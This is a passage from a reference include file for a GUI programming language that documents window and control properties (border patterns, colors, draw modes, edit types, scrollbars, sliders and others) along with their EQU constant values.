. DashDot2 - Pen has dashes and double dots.
. Dot - Pen is dotted.
. InsideFrame - Pen is solid. The figure and border is created
. inside the frame defined by the user specified
. rectangle.
. Solid - Pen is solid.
. None - Pen defaults to solid.
.
. Note1: The border pattern only takes affect when the BDRWIDTH
. property has a value of 1.
.
. Objects:
. LINE
. SHAPE
.
. dnumnvar values:
.
.$NONE EQU 0 // Default
. BDRPATTERN property values (effective only when BDRWIDTH is 1,
. per Note1 above).
$DASH EQU 1
$DASHDOT EQU 2
$DASHDOT2 EQU 3
$DOT EQU 4
$INSIDEFRAME EQU 5
$SOLID EQU 6
.
*------------------------------------------------------------------------------
. BDRWIDTH=dnumnvar CREATE SETPROP GETPROP
.
. Description:
. This property defines the width of the pen used to draw the
. object.
.
. Note1: The border pattern only takes affect when the BDRWIDTH
. property has a value of 1.
.
. Objects:
. LINE
. SHAPE
.
. dnumnvar values:
.
. The <dnumnvar> value specifies number of pixels for width.
.
*------------------------------------------------------------------------------
. BGCOLOR=dnumnvar|color object CREATE SETPROP GETPROP
.
. Description:
. This property allows the user program to specify the color to
. be used for the background color. The parameter description
. is the same as for the BDRCOLOR property.
.
. Objects:
. CHECKBOX
. CHECKGRP
. COMBOBOX
. DATALIST
. EDITTEXT
. GROUPBOX
. HSCROLLBAR
. PICT
.       POPUPMENU ( OBSOLETE )
. PROGRESS
. RADIOGRP
. RADIO
. SHAPE
. STATTEXT
. VSCROLLBAR
. WINDOW
.
. dnumnvar values:
.
. See the BDRCOLOR property for the color equate values.
.
*------------------------------------------------------------------------------
. BOLD[=dnumnvar] CREATE SETPROP GETPROP
.
. Description:
. This property specifies that the font should be bolded. When
. the <dnumnvar> value is not provided, this indicates that the
. BOLD is turned on.
.
. Objects:
. FONT
.
. dnumnvar values:
.
.$OFF EQU 0 // Default
.$ON EQU 1
.
*------------------------------------------------------------------------------
. BORDER[=dnumnvar] CREATE SETPROP GETPROP
.
. Description:
. This property defines when an object is to have a border.
. If the <dnumnvar> parameter is not provided, this indicates that
. the border is to be used.
.
. Objects:
. CHECKGRP
. EDITTEXT
. MOVIE
. PICT
. RADIOGRP
. SLIDER
. STATTEXT
. WINDOW
.
. dnumnvar values:
.
.$OFF EQU 0 // Default
.$ON EQU 1
.
*------------------------------------------------------------------------------
. CANCEL[=dnumnvar] CREATE SETPROP GETPROP
.
. Description:
. This property specifies that the BUTTON object activation routine
. is to gain program control when the escape key is entered.
.
. Objects:
. BUTTON
.
. dnumnvar values:
.
.$OFF EQU 0 // Default
.$ON EQU 1
.
*------------------------------------------------------------------------------
. CAPTION=dnumnvar CREATE SETPROP GETPROP
.
. Description:
. This property allows a user to specify if a Window is to be
. created with or without a title bar. This property is
. provided to the OS to eliminate/retain the caption bar as
. appropriate.
.
. NOTE1: Under Windows95 and Win32s, the CAPTION property will
. have an effect on a MODAL or MODELESS window. The
. CAPTION property does not have an affect on the PRIMARY
. window types.
.
. Objects:
. WINDOW
.
. dnumnvar values:
.
.$OFF EQU 0
.$ON EQU 1 // Default
.
*------------------------------------------------------------------------------
. CENTER[=dnumnvar] CREATE
.
. Description:
. The CENTER property specifies that the text is to be centered
. horizontally for the object. The property is replaced with
. the ALIGNMENT property. The ALIGNMENT property is to be used
. for performing SETPROP and GETPROP operations.
.
. If the syntax form is used where the <dnumnvar> value is not
. specified, this indicates that the CENTER property is to be
. turned on.
.
. Also note that if the CENTER property is turned off, this causes
. the text output to be justified to the left.
.
. Objects:
. EDITTEXT
. STATTEXT
.
. dnumnvar values:
.
.$OFF EQU 0 // Default
.$ON EQU 1
.
*------------------------------------------------------------------------------
. CENTERPOS=dnumnvar CREATE
.
. Description:
. When the user defined rectangle is larger than the EDITTEXT
. object, this property controls whether the EDITTEXT object is to
. be centered TOP/BOTTOM or not. The default action is to
. have the EDITTEXT object centered TOP/BOTTOM within the user
. defined rectangle parameters. If the CENTERPOS property is
. set to $TOPLEFTPOS, then the CREATE action is to have the
. EDITTEXT object rectangle be located at the TOP/LEFT coordinates.
.
. Objects:
. EDITTEXT
.
. dnumnvar values:
.
. CENTERPOS property values.
$CENTERPOS EQU 0 // Default
$TOPLEFTPOS EQU 1
.
*------------------------------------------------------------------------------
. CLIPCTRL=dnumnvar CREATE SETPROP GETPROP
.
. Description:
. Excludes the area occupied by child windows/objects when
. drawing within the parent window. If the property is turned
. on, this can slow the performance of drawing objects due to
. OS overhead in determining valid clipping regions.
.
. Objects:
. WINDOW
.
. dnumnvar values:
.
.$OFF EQU 0 // Default
.$ON EQU 1
.
*------------------------------------------------------------------------------
. COMBOSTYLE=dnumnvar CREATE GETPROP
.
. Description:
. The COMBOSTYLE property specifies the type of COMBOBOX window
. object to be generated. A default combobox list object is a
.       combobox with a drop down list where the combobox does not have
. an editable capability. The $EDIT <dnumnvar> value
. defines a combobox list like the default except the combobox
. does allow editing capability. Only the current selection field
. can be edited. The $SIMPLE <dnumnvar> value is the
. same as the $EDIT except the list is always present.
.
. Objects:
. COMBOBOX
.       POPUPMENU ( OBSOLETE )
.
. dnumnvar values:
.
.$NONE EQU 0 // Same as $LIST
. COMBOSTYLE property values ($NONE=0 behaves like $LIST, per comment
. above).
$EDIT EQU 1
$LIST EQU 2 // Default
$SIMPLE EQU 3
.
*------------------------------------------------------------------------------
. DATA=svarslit CREATE SETPROP GETPROP
.
. Description:
. This property allows the items in a DATALIST to be initialized using
. a string composed of a list of items with each item separated with
. semi-colon.
.
. Objects:
. DATALIST
.
. svarslit value:
.
. String of semicolon separated list items.
.
*------------------------------------------------------------------------------
. DEFAULT[=dnumnvar] CREATE SETPROP GETPROP
.
. Description:
. This property specifies that the BUTTON object activation routine
. is to gain program control when the enter key is entered and
. a non-button object has the focus. However, if a button object
. other than the DEFAULT button object has the focus when the enter
. key is entered, then the activation routine of the button object
. with the focus gains the program control.
.
. Note1: The operation when a button object other than the DEFAULT
. button object has the focus is different from prior releases
. to release 8.1.
.
. Objects:
. BUTTON
.
. dnumnvar values:
.
.$OFF EQU 0 // Default
.$ON EQU 1
.
*------------------------------------------------------------------------------
. DIGITS[=dnumnvar] CREATE
.
. Description:
. This property is a CREATE only property.
. The property specifies that the EDITTEXT object is to only
. allow numeric digits 0 through 9. When this property is set to
. indicate off state, then this indicates that all characters are
. allowed.
.
. Note1: Use of the property should be replaced through use of
. the EDITTYPE property.
.
. Objects:
. EDITTEXT
.
. dnumnvar values:
.
.$OFF EQU 0 // Default
.$ON EQU 1
.
*------------------------------------------------------------------------------
. DRAWMODE=dnumnvar CREATE SETPROP GETPROP
.
. Description:
. This property specifies the current foreground mix mode.
. The foreground mix mode defines how colors from the object
. and the colors in the existing presentation image are to be
. combined.
.
. The following is a Windows summary of the drawmodes.
.
. Mix mode Description
.
. BLACKNESS Pixel is always 0.
.
. COPYPEN Pixel is the pen color.
.
. INVERT Pixel is the inverse of the screen color.
.
. MASKNOTPEN Pixel is a combination of the colors common
. to both the screen and the inverse of the pen.
.
. MASKPEN Pixel is a combination of the colors common
. to both the pen and the screen.
.
. MASKPENNOT Pixel is a combination of the colors common
. to both the pen and the inverse of the screen.
.
. MERGENOTPEN Pixel is a combination of the screen color and
. the inverse of the pen color.
.
. MERGEPEN Pixel is a combination of the pen color and
. the screen color.
.
. MERGEPENNOT Pixel is a combination of the pen color and
. the inverse of the screen color.
.
. NOP Pixel remains unchanged.
.
. NOTCOPYPEN Pixel is the inverse of the pen color.
.
. NOTMASKPEN Pixel is the inverse of the MASKPEN color.
.
. NOTMERGEPEN Pixel is the inverse of the MERGEPEN color.
.
. NOTXORPEN Pixel is the inverse of the XORPEN color.
.
. WHITENESS Pixel is always 1.
.
. XORPEN Pixel is a combination of the pen color and
. the screen color, but not in both.
.
. Objects:
. LINE
. SHAPE
.
. dnumnvar values:
.
.$NONE EQU 0 //Same as default
. DRAWMODE foreground mix-mode values (see the mode table above).
$BLACKNESS EQU 1
$COPYPEN EQU 2 //Default
$INVERT EQU 3
$MASKNOTPEN EQU 4
$MASKPEN EQU 5
$MASKPENNOT EQU 6
$MERGENOTPEN EQU 7
$MERGEPEN EQU 8
$MERGEPENNOT EQU 9
$NOP EQU 10
$NOTCOPYPEN EQU 11
$NOTMASKPEN EQU 12
$NOTMERGEPEN EQU 13
$NOTXORPEN EQU 14
$WHITENESS EQU 15
$XORPEN EQU 16
.
*------------------------------------------------------------------------------
. DROPID=dnumnvar CREATE SETPROP GETPROP
.
. Description:
. When this property is specified, then the object which has the
. DROPID property can receive an item drop action. The value of
. the DROPID is sent to the activation routine of the object which
. is being dragged.
.
. Objects:
. BUTTON
. CHECKBOX
. CHECKGRP
. COMBOBOX
. DATALIST
. EDITTEXT
. GROUPBOX
. HSCROLLBAR
. ICON
. MOVIE
. PICT
.       POPUPMENU ( OBSOLETE )
. PROGRESS
. RADIOGRP
. RADIO
. SHAPE
. SLIDER
. STATTEXT
. TABCONTROL
. VSCROLLBAR
.
. dnumnvar values:
.
*------------------------------------------------------------------------------
. EDITHIDESEL=dnumnvar CREATE SETPROP GETPROP
.
. Description:
. This property negates the default behavior for EDITTEXT object.
. The default behavior hides the selection when the edittext
. loses the input focus and inverts the selection when the
. edittext receives the input focus. If this property is turned
. on, the selected text is inverted, even if the edittext does
. not have the focus.
.
. Objects:
. EDITTEXT
.
. dnumnvar values:
.
.$OFF EQU 0 // Default
.$ON EQU 1
.
*------------------------------------------------------------------------------
. EDITTYPE=dnumnvar CREATE SETPROP GETPROP
.
. Description:
. This property specifies the type of edittext object as follows:
.
. ALL - Allow data entry of any keyed characters.
.
. DECIMAL - Only allow data entry into the edittext
. of numeric digits ( 0 through 9 ), '-',
. and '.'.
. INTEGER - Only allow data entry into the edittext
. of numeric digits only. ( 0 through 9 ).
. LOWERCASE - Convert all characters to lowercase as they
. are entered into the edittext.
. UPPERCASE - Convert all characters to uppercase as they
. are entered into the edittext.
.
. Note1: This property should be used in place of older properties
. which provide the same functions.
.
. Objects:
. EDITTEXT
.
. dnumnvar values:
.
.$NONE EQU 0 // Default
$ALL EQU 1 // Allow entry of any keyed characters
$DECIMAL EQU 2 // Digits 0-9, '-', and '.' only
$INTEGER EQU 3 // Digits 0-9 only
$LOWERCASE EQU 4 // Convert entered characters to lowercase
$UPPERCASE EQU 5 // Convert entered characters to uppercase
.
*------------------------------------------------------------------------------
. ENABLED=dnumnvar CREATE SETPROP GETPROP
.
. Description:
. This property specifies when an object is to be DISABLED/ENABLED.
. If the ENABLED property is set to $OFF for the CREATE/SETPROP
. statements, this is the same as if a DISABLEITEM with an ITEMNO
. value of zero was executed for the object. If the ENABLED
. property is set to $ON for the SETPROP, this is the same as if
. an ENABLEITEM with an ITEMNO value of zero was executed for the
. object. The GETPROP statement returns the current DISABLED/ENABLED
. state for the object.
.
. Note1: If the ENABLED property is set to $OFF for the objects
. ICON, MREGION, MOVIE, GROUPBOX, or PROGRESS there is
. no visible graying which identifies that the object is
. disabled. However, there are no events processed for
. these objects when the ENABLED property is set to $OFF.
.
. Objects:
. BUTTON
. CHECKBOX
. CHECKGRP
. COMBOBOX
. DATALIST
. EDITTEXT
. GROUPBOX
. HSCROLLBAR
. ICON
. MREGION
. MOVIE
. PICT
. POPUPMENU
. PROGRESS
. RADIO
. RADIOGRP
. SHAPE
. SLIDER
. STATTEXT
. TABCONTROL
. VSCROLLBAR
. WINDOW
.
. dnumnvar values:
.
.$OFF EQU 0
.$ON EQU 1 // Default
.
*------------------------------------------------------------------------------
. EVENTFILTER=svarslit CREATE SETPROP GETPROP
.
. Description:
. This property specifies a string control structure which allows
. events for the edittext object to be controlled. See manual
. discussion under create for specific details.
.
. Objects:
. EDITTEXT
.
. svarslit values:
.
. The <svarslit> string is composed of 'Y' and 'N'
. characters which relate to a given edittext object
. event type by position in the string.
.
*------------------------------------------------------------------------------
. FGCOLOR=dnumnvar|color object CREATE SETPROP GETPROP
.
. Description:
. This property allows the user program to specify the color to
. be used for the foreground color of the object. The parameter
. description is the same as for the BDRCOLOR property.
.
. Objects:
. CHECKBOX
. CHECKGRP
. COMBOBOX
. DATALIST
. EDITTEXT
. GROUPBOX
. POPUPMENU ( OBSELETE )
. PROGRESS
. RADIOGRP
. RADIO
. STATTEXT
. WINDOW
.
. dnumnvar values:
.
. See BDRCOLOR property for details.
.
*------------------------------------------------------------------------------
. FILLCOLOR=dnumnvar|color object CREATE SETPROP GETPROP
.
. Description:
. This property specifies the color to be used when filling the
. shape object. Please see the description under BDRCOLOR for
. a detailed discussion of colors.
.
. Objects:
. SHAPE
.
. dnumnvar values:
.
. See BDRCOLOR property for details.
.
*------------------------------------------------------------------------------
. FILLSTYLE=dnumnvar CREATE SETPROP GETPROP
.
. Description:
. This property defines the type of hatch used to fill a shape
. object. The following is a summary of the types of hatches
. available under Windows.
.
. Value Meaning
.
. DOWNDIAG 45-degree downward left-to-right hatch
. CROSS Horizontal and vertical crosshatch
. DIAGCROSS 45-degree crosshatch
. UPDIAG 45-degree upward left-to-right hatch
. HORZLINE Horizontal hatch
. VERTLINE Vertical hatch
. NOHATCH SHAPE object filled with solid color as
. specified by FILLCOLOR.
. CLEARHATCH SHAPE object fill area becomes transparent
. such that underlying colors show through
. the object.
.
. Objects:
. SHAPE
.
. dnumnvar values:
.
.$NONE EQU 0 // Same as $NOHATCH
$CROSS EQU 1 // Horizontal and vertical crosshatch
$DIAGCROSS EQU 2 // 45-degree crosshatch
$DOWNDIAG EQU 3 // 45-degree downward left-to-right hatch
$HORZLINE EQU 4 // Horizontal hatch
$NOHATCH EQU 5 // Default - solid fill using FILLCOLOR
$CLEARHATCH EQU 6 // Transparent fill area (underlying colors show through)
$UPDIAG EQU 7 // 45-degree upward left-to-right hatch
$VERTLINE EQU 8 // Vertical hatch
.
*------------------------------------------------------------------------------
. FONT=svarslit|font object CREATE SETPROP GETPROP
.
. Description:
. This property specifies the font to be used for the supported
. objects.
.
. Objects:
. BUTTON
. CHECKBOX
. CHECKGRP
. COMBOBOX
. DATALIST
. EDITTEXT
. GROUPBOX
. POPUPMENU ( OBSELETE )
. PROGRESS
. RADIOGRP
. RADIO
. STATTEXT
. TABCONTROL
. WINDOW
.
. svarslit|font:
.
*------------------------------------------------------------------------------
. GROUPID=dnumnvar CREATE SETPROP GETPROP
.
. Description:
. This property specifies the group identifier for a radio button or
. checkbox object. All objects with the same group identifier are
. treated as one group for purposes of moving focus using the TAB or
. arrow keys. For radio buttons, this property is also used to
. determine which radio button to turn off when one is turned on.
.
. Objects:
. CHECKBOX
. RADIO
.
. dnumnvar values:
.
*------------------------------------------------------------------------------
. HEIGHT=dnumnvar SETPROP GETPROP
.
. Description:
. This property is a GETPROP/SETPROP only property. The height
. of the object can be retrieved using the GETPROP statement.
. The height is determined by subtracting the top object rectangle
. coordinate from the bottom object rectangle coordinate. The
. SETPROP statement can be used to change the current height of
. an object.
.
. Objects:
. BUTTON
. CHECKBOX
. CHECKGRP
. COMBOBOX
. DATALIST
. DIALOG
. EDITTEXT
. GROUPBOX
. HSCROLLBAR
. ICON
. MREGION
. MOVIE
. PICT
. POPUPMENU ( OBSELETE )
. PROGRESS
. RADIOGRP
. RADIO
. SLIDER
. STATTEXT
. TABCONTROL
. VSCROLLBAR
. WINDOW
.
. dnumnvar values:
.
. The <dnumnvar> value is provided in the same units as used for
. the creation of an object. This means that if an object was
. created using pixels, then the height expects to use pixels.
.
*------------------------------------------------------------------------------
. HELPID=dnumnvar CREATE SETPROP GETPROP
.
. Description:
. This property is used in conjunction with a Windows Help file
. provided by the user. If a program is executing with the F1HELP
. set to ON using a SETMODE statement, then this HELPID value is
. used as the help index context value for finding a given subject
. in the help file when an object has the focus and the F1 function
. key is entered.
.
. Objects:
. BUTTON
. CHECKBOX
. CHECKGRP
. COMBOBOX
. DATALIST
. EDITTEXT
. HSCROLLBAR
. ICON
. POPUPMENU ( OBSELETE )
. PROGRESS
. RADIOGRP
. RADIO
. SLIDER
. TABCONTROL
. VSCROLLBAR
.
. dnumnvar values:
.
. The <dnumnvar> value defines a help file context index value.
.
*------------------------------------------------------------------------------
. HWND=nvar GETPROP
.
. Description:
. This property is a GETPROP only property. The HWND property
. value is a Windows window handle for the supported object.
. This HWND value could be used in WINAPI functions where
. a window handle is required for the function.
.
. Objects:
. BUTTON
. CHECKBOX
. COMBOBOX
. DATALIST
. DIALOG
. EDITTEXT
. HSCROLLBAR
. MOVIE
. POPUPMENU ( OBSELETE )
. RADIO
. SLIDER
. TABCONTROL
. VSCROLLBAR
. WINDOW
.
. nvar values:
.
. The <nvar> value retrieve is a Windows window handle for
. the supported object.
.
*------------------------------------------------------------------------------
. INTEGRAL=dnumnvar CREATE SETPROP GETPROP
.
. Description:
. This property specifies when a DATALIST is to resize for the
. number of items in a list versus leaving the size of the DATALIST
. to be as defined by the user rectangle coordinates. When the
. INTEGRAL property is set to OFF, then the size of the list box
. is the size specified by the user coordinate values. When the
. INTEGRAL property is set to ON, then the normal action of Windows
. is to resize a list box so that the list box does not display
. partial items.
.
. Objects:
. DATALIST
.
. dnumnvar values:
.
.$OFF EQU 0
.$ON EQU 1 // Default
.
*------------------------------------------------------------------------------
. ITALIC[=dnumnvar] CREATE SETPROP GETPROP
.
. Description:
. This property specifies that the font should be italic. When
. the <dnumnvar> value is not provided, this indicates that the
. ITALIC property is turned on.
.
. Objects:
. FONT
.
. dnumnvar values:
.
.$OFF EQU 0 // Default
.$ON EQU 1
.
*------------------------------------------------------------------------------
. LEFT=dnumnvar SETPROP GETPROP
.
. Description:
. This property is a GETPROP/SETPROP only property. The LEFT
. property returns the left coordinate of a created object.
.
. Objects:
. BUTTON
. CHECKBOX
. CHECKGRP
. COMBOBOX
. DATALIST
. DIALOG
. EDITTEXT
. FLOATMENU
. GROUPBOX
. HSCROLLBAR
. ICON
. MREGION
. MOVIE
. PICT
. POPUPMENU ( OBSELETE )
. PROGRESS
. RADIOGRP
. RADIO
. SLIDER
. STATTEXT
. TABCONTROL
. VSCROLLBAR
. WINDOW
.
. dnumnvar values:
.
. The <dnumnvar> value is provided in the same units as used when
. the object was created.
.
*------------------------------------------------------------------------------
. LINKHSCROLL=<hscrollbar> CREATE GETPROP
.
. Description:
. This property is to allow a horizontal scrollbar object to be
. linked to the scrollbar which may be generated for a PICT or a
. WINDOW object. After the logical linkage is established, then
. operations on the linked scrollbar can be executed. This means
. that a GETITEM for the <hscrollbar> object can be executed to
. determine the current settings of the scrollbar which has been
. generated for another object.
.
. Note1: It is not possible to change the MIN, MAX, or SHIFT values
. for a picture linked scrollbar using either the SETPROP or
. SETITEM. A picture linked scrollbar can change the thumb
. position and tab id. These restrictions do not apply to
. a window linked scrollbar.
.
. Objects:
. PICT
. WINDOW
.
*------------------------------------------------------------------------------
. LINKVSCROLL=<vscrollbar> CREATE GETPROP
.
. Description:
. This property is to allow a vertical scrollbar object to be
. linked to the scrollbar which may be generated for a PICT or a
. WINDOW object. After the logical linkage is established, then
. operations on the linked scrollbar can be executed. This means
. that a GETITEM for the <vscrollbar> object can be executed to
. determine the current settings of the scrollbar which has been
. generated for another object.
.
. Note1: It is not possible to change the MIN, MAX, or SHIFT values
. for a linked scrollbar using either the SETPROP or SETITEM.
. It is possible to change the thumb position however.
.
. Objects:
. PICT
. WINDOW
.
*------------------------------------------------------------------------------
. LOWERCASE[=dnumnvar] CREATE
.
. Description:
. This property is a CREATE only property.
. The property specifies that the EDITTEXT object is to convert
. all entered data to lowercase. When this property is set to
. be OFF, then this indicates that no data conversion occurs.
.
. Note1: Use of the property should be replaced through use of
. the EDITTYPE property.
.
. Objects:
. EDITTEXT
.
. dnumnvar values:
.
.$OFF EQU 0 // Default
.$ON EQU 1
.
*------------------------------------------------------------------------------
. MAX=dnumnvar See Objects:
.
. Description:
. This property defines the maximum value when the slider thumb is at
. the bottom or right most position of the supported object.
.
. Objects:
. HSCROLLBAR SETPROP GETPROP
. SLIDER CREATE SETPROP GETPROP
. VSCROLLBAR SETPROP GETPROP
.
. dnumnvar values:
.
. The value is a logical unit as specified by the user.
.
*------------------------------------------------------------------------------
. MAXBOX=dnumnvar CREATE SETPROP GETPROP
.
. Description:
. This property specifies when a MAXIMIZE box for the window
. object should be allowed or not.
.
. Note1: The MAXBOX property does not have an effect if the
. CAPTION property is set to $OFF for a MODAL or MODELESS
. window type.
.
. Objects:
. WINDOW
.
. dnumnvar values:
.
.$OFF EQU 0
.$ON EQU 1 // Default
.
*------------------------------------------------------------------------------
. MAXCHARS=dnumnvar CREATE SETPROP GETPROP
.
. Description:
. Specifies the maximum number of characters allowed to
. be entered into edittext object. This applies whether
. edittext is single line or multiline.
.
. Objects:
. EDITTEXT
.
. dnumnvar values:
.
. The <dnumnvar> value defines number of characters.
.
*------------------------------------------------------------------------------
. MAXCOLS=dnumnvar CREATE SETPROP GETPROP
.
. Description:
. The property is the maximum number of characters allowed for
. an individual line in a multiline edittext object. This property
. is ignored if the MULTILINE is not used.
.
. Objects:
. EDITTEXT
.
. dnumnvar values:
.
. The <dnumnvar> value defines number of characters.
.
*------------------------------------------------------------------------------
. MIN=dnumnvar See Objects:
.
. Description:
. This property defines the minimum value when the slider thumb is at
. the top or left most position of the supported object.
.
. Objects:
. HSCROLLBAR SETPROP GETPROP
. SLIDER CREATE SETPROP GETPROP
. VSCROLLBAR SETPROP GETPROP
.
. dnumnvar values:
.
. The value is a logical unit as specified by the user.
.
*------------------------------------------------------------------------------
. MINBOX=dnumnvar CREATE SETPROP GETPROP
.
. Description:
. This property specifies when a MINIMIZE box for the window
. object should be allowed or not.
.
. Note1: The MINBOX property does not have an effect if the
. CAPTION property is set to $OFF for a MODAL or MODELESS
. window type.
.
. Objects:
. WINDOW
.
. dnumnvar values:
.
.$OFF EQU 0
.$ON EQU 1 // Default
.
*------------------------------------------------------------------------------
. MULTILINE[=dnumnvar] CREATE SETPROP GETPROP
.
. Description:
. This property defines the number of lines to be allowed
. for an edittext object. If a user <dnumnvar> value
. is not specified, then the number of lines allowed is
. set to 32000. If the number of lines specified can
. fit into the user specified rectangle coordinates, then
. scrollbars are not provided. Otherwise, scrollbars will
. exist for the edittext object.
.
. Objects:
. EDITTEXT
.
. dnumnvar values:
.
. The <dnumnvar> value specifies number of lines.
.
*------------------------------------------------------------------------------
. MULTIROW=dnumnvar CREATE SETPROP GETPROP
.
. Description:
. This property is used to indicate if labels are allowed to be
. shown in multiple rows. If multiple rows are not allowed, and
. the labels are too large to fit in one row, left and right
. arrow buttons are drawn to allow access to the other labels.
.
. Objects:
. TABCONTROL
.
. dnumnvar values:
.
.$OFF EQU 0 // Default
.$ON EQU 1
.
*------------------------------------------------------------------------------
. MULTISELECT[=dnumnvar] CREATE SETPROP GETPROP
.
. Description:
. This property allows multiple items to be selected from a
. DATALIST. If the <dnumnvar> parameter is not provided, the
. MULTISELECT is set to ON.
.
. Objects:
. DATALIST
.
. dnumnvar values:
.
.$OFF EQU 0 // Default
.$ON EQU 1
.
*------------------------------------------------------------------------------
. NOAUTOZOOM (OBSELETE) CREATE
.
. Description:
. This is an obsolete property maintained only for backward
. source compatibility. The NOAUTOZOOM property is the same
. as AUTOZOOM=0.
.
. Note1: The AUTOZOOM property must be used if SETPROP/GETPROP
. operations are required.
.
. Objects:
. PICT
.
. dnumnvar values:
.
. None
.
*------------------------------------------------------------------------------
. NOINTEGRAL (OBSELETE) CREATE
.
. Description:
. This property is a CREATE only property and is obsolete.
. It is maintained only for backward source compatibility.
. The NOINTEGRAL property is the same as INTEGRAL=0.
.
. Note1: The INTEGRAL property must be used if SETPROP/GETPROP
. operations are required.
.
. Objects:
. DATALIST
.
. dnumnvar values:
.
. None
.
*------------------------------------------------------------------------------
. NOPERCENT (OBSELETE) CREATE
.
. Description:
. This property is a CREATE only property and is obsolete.
. It is maintained only for backward source compatibility.
. The NOPERCENT property is the same as PERCENT=0.
.
. Note1: The PERCENT property must be used if SETPROP/GETPROP
. operations are required.
.
. Objects:
. PROGRESS
.
. dnumnvar values:
.
. None
.
*------------------------------------------------------------------------------
. NORESIZE (OBSELETE) CREATE
.
. Description:
. This property is a CREATE only property and is obsolete.
. It is maintained only for backward source compatibility.
. The NORESIZE property is the same as RESIZE=0.
.
. Note1: The RESIZE property must be used if SETPROP/GETPROP
. operations are required.
.
. Objects:
. PICT
.
. dnumnvar values:
.
. None
.
*------------------------------------------------------------------------------
. NOSCROLL (OBSELETE) CREATE
.
. Description:
. This property is a CREATE only property and is obsolete.
. It is maintained only for backward source compatibility.
. The NOSCROLL property is the same as SCROLLBAR=0.
.
. Note1: The SCROLLBAR property must be used if SETPROP/GETPROP
. operations are required.
.
. Objects:
. PICT
.
. dnumnvar values:
.
. None
.
*------------------------------------------------------------------------------
. NUMERIC[=dnumnvar] CREATE
.
. Description:
. This property is a CREATE only property.
. The property specifies that the EDITTEXT object is to allow
. numeric digits 0 through 9, '-' character, and '.' character.
. When this property is set to the OFF state, this indicates that
. all characters are allowed. If the <dnumnvar> value is not
. provided, the NUMERIC property is set to ON.
.
. Note1: Use of the property should be replaced through use of
. the EDITTYPE property.
.
. Objects:
. EDITTEXT
.
. dnumnvar values:
.
.$OFF EQU 0 // Default
.$ON EQU 1
.
*------------------------------------------------------------------------------
. OBJECTID=dnumnvar CREATE SETPROP GETPROP
.
. Description:
. This property specifies an identification number for an object.
. The OBJECTID value is available through the use of the EVENTINFO
. or EVENTREG statements to identify the object which caused
. an event to occur.
.
. Objects:
. BUTTON
. CHECKBOX
. CHECKGRP
. COMBOBOX
. DATALIST
. DIALOG
. EDITTEXT
. FLOATMENU
. GROUPBOX
. HSCROLLBAR
. ICON
. LINE
. MENU
. MREGION
. MOVIE
. PICT
. POPUPMENU ( OBSELETE )
. PROGRESS
. RADIOGRP
. RADIO
. SHAPE
. SLIDER
. STATTEXT
. SUBMENU
. TABCONTROL
. TIMER
. VSCROLLBAR
. WINDOW
.
. dnumnvar values:
.
. The <dnumnvar> is a user specified number to identify an object.
.
*------------------------------------------------------------------------------
. ORIENTATION=dnumnvar CREATE SETPROP GETPROP
.
. Description:
. The property controls whether a slider object is to be
. horizontal or vertical.
.
. Objects:
. SLIDER
.
. dnumnvar values:
.
.$NONE EQU 0 // Same as $VERT
$HORZ EQU 1 // Horizontal slider
$VERT EQU 2 // Default - vertical slider
.
*------------------------------------------------------------------------------
. PAGE=dnumnvar CREATE
.
. Description:
. This is a CREATE only property.
. This property specifies the page to be used for the pict object
. when a DCX picture is used.
.
. Objects:
. PICT
.
. dnumnvar values:
.
. The <dnumnvar> specifies a page value.
.
*------------------------------------------------------------------------------
. PASSWORD[=dnumnvar] CREATE
.
. Description:
. This is a CREATE only property.
. This property specifies that the edittext is to have each
. character echoed as a '*' character. If the <dnumnvar> value
. is not specified, the PASSWORD property is set to ON.
.
. Objects:
. EDITTEXT
.
. dnumnvar values:
.
.$OFF EQU 0 // Default
.$ON EQU 1
.
*------------------------------------------------------------------------------
. PERCENT=dnumnvar CREATE SETPROP GETPROP
.
. Description:
. This property specifies if a percentage value is to be displayed
. for the progress object or not.
.
. Objects:
. PROGRESS
.
. dnumnvar values:
.
.$OFF EQU 0 // Default
.$ON EQU 1
.
*------------------------------------------------------------------------------
. PICTSIZEH=nvar GETPROP
.
. Description:
. This property is a GETPROP only property. This retrieves the
. horizontal size of a picture. The value is expressed in pixels.
.
. Objects:
. PICT
.
. nvar values:
.
. The <nvar> value retrieved is the horizontal pixel size of the picture.
.
*------------------------------------------------------------------------------
. PICTSIZEV=nvar GETPROP
.
. Description:
. This property is a GETPROP only property. This retrieves the
. vertical size of a picture. The value is expressed in pixels.
.
. Objects:
. PICT
.
. nvar values:
.
. The <nvar> value retrieved is the vertical pixel size of the picture.
.
*------------------------------------------------------------------------------
. POS=dnumnvarH:dnumnvarV SETPROP GETPROP
.
. Description:
. This property is a SETPROP/GETPROP only property.
. The POS property specifies the starting horizontal and vertical
. pixel coordinate in a pict object where the picture is to be
. displayed.
.
. Objects:
. PICT
.
. dnumnvar values:
.
. The <dnumnvarH> value is the horizontal pixel coordinate in the pict.
. The <dnumnvarV> value is the vertical pixel coordinate in the pict.
.
*------------------------------------------------------------------------------
. PRINTER[=dnumnvar] CREATE SETPROP GETPROP
.
. Description:
. This property specifies that the datalist object is to be filled
. with the current Windows printer names. If the <dnumnvar> value
. is not provided, the PRINTER property is set to ON.
.
. Objects:
. DATALIST
.
. dnumnvar values:
.
.$OFF EQU 0 // Default
.$ON EQU 1
.
*------------------------------------------------------------------------------
. READONLY[=dnumnvar] CREATE SETPROP GETPROP
.
. Description:
. This property specifies that the edittext object is a read only
. object. The user can place the caret into the edittext object
. to cut/copy data, however, the current edittext data can not
. be changed by the user. If the <dnumnvar> value is not specified,
. the READONLY property is turned on.
.
. Objects:
. EDITTEXT
.
. dnumnvar values:
.
.$OFF EQU 0 // Default
.$ON EQU 1
.
*------------------------------------------------------------------------------
. RESIZE=dnumnvar CREATE SETPROP GETPROP
.
. Description:
. This property specifies if a picture is to be resized to fit
. pict object rectangle coordinates.
.
. Objects:
. PICT
.
. dnumnvar values:
.
.$OFF EQU 0 // Default
.$ON EQU 1
.
*------------------------------------------------------------------------------
. RESOURCE=dnumnvar SETPROP GETPROP
.
. Description:
. This property is a SETPROP/GETPROP only property.
. The RESOURCE property allows a resource id to be retrieved/changed
. for supported objects.
.
. Objects:
. ICON
. PICT
.
. dnumnvar values:
.
. The <dnumnvar> value is valid resource id which can be found
. in a resource DLL or resources loaded for a PLFORM.
.
*------------------------------------------------------------------------------
. RIGHT[=dnumnvar] CREATE
.
. Description:
. The RIGHT property specifies that the text is to be right justified
. horizontally for the object. The property is replaced by
. the ALIGNMENT property. The ALIGNMENT property is to be used
. for performing SETPROP and GETPROP operations.
.
. If the syntax form is used where the <dnumnvar> value is not
. specified, this indicates that the RIGHT property is to be
. turned on.
.
